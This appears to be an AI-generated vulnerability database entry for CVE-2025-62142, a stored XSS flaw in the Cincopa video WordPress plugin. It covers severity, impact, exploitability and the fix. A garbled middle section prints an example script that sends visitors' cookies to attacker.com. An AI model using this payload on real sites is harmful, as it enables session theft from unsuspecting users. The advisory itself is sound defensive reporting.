
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-62142 is a Stored Cross-Site Scripting (XSS) vulnerability in the Cincopa video and media plugin (also known as Post Video Players, plugin slug: video-playlist-and-gallery-plugin) for WordPress, developed by nicashmu. The vulnerability allows authenticated attackers with high privileges to inject and store malicious scripts that execute in victims' browsers. All versions through 1.163 are affected. It was published on December 31, 2025, and assigned by Patchstack. The CVSS v3.1 base score is 5.9 (Medium) (Red Hat CVE, Patchstack).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). It is a Stored XSS variant, meaning malicious input is persisted server-side and later rendered unsanitized in web pages viewed by other users. Exploitation requires network access, low attack complexity, high privileges (e.g., administrator or editor role), and user interaction from a victim who views the affected page. The scope is changed, meaning the injected script can affect resources beyond the vulnerable component itself (Red Hat CVE, Patchstack).
Successful exploitation results in low confidentiality, integrity, and availability impacts within a changed scope, meaning injected scripts can affect browser sessions of users who view the compromised content. An attacker could steal session cookies, perform actions on behalf of victims, redirect users to malicious sites, or deface site content. Because the payload is stored, every user who loads the affected page is potentially impacted without further attacker interaction (Red Hat CVE).
No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported for CVE-2025-62142. The EPSS score is approximately 0.033%, indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation is constrained by the requirement for high-privilege authentication, limiting the attacker pool to users with administrator or equivalent access on the WordPress site (Red Hat CVE, Patchstack).
video-playlist-and-gallery-plugin) at version 1.163 or earlier, using tools like WPScan or by inspecting plugin directories.<script>document.location='https://attacker.com/steal?c='+document.cookie</script>) into a vulnerable input field that is stored by the plugin.wp_options or wp_postmeta tables containing <script> tags or JavaScript event handlers associated with the Cincopa plugin.WordPress site administrators should update the Cincopa video and media plugin (Post Video Players) to a version later than 1.163, which addresses this vulnerability. If an immediate update is not possible, consider disabling the plugin until a patch can be applied. Additionally, restrict administrative access to trusted users only and enforce strong authentication (e.g., multi-factor authentication) to reduce the risk of privilege abuse (Patchstack, Red Hat CVE).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."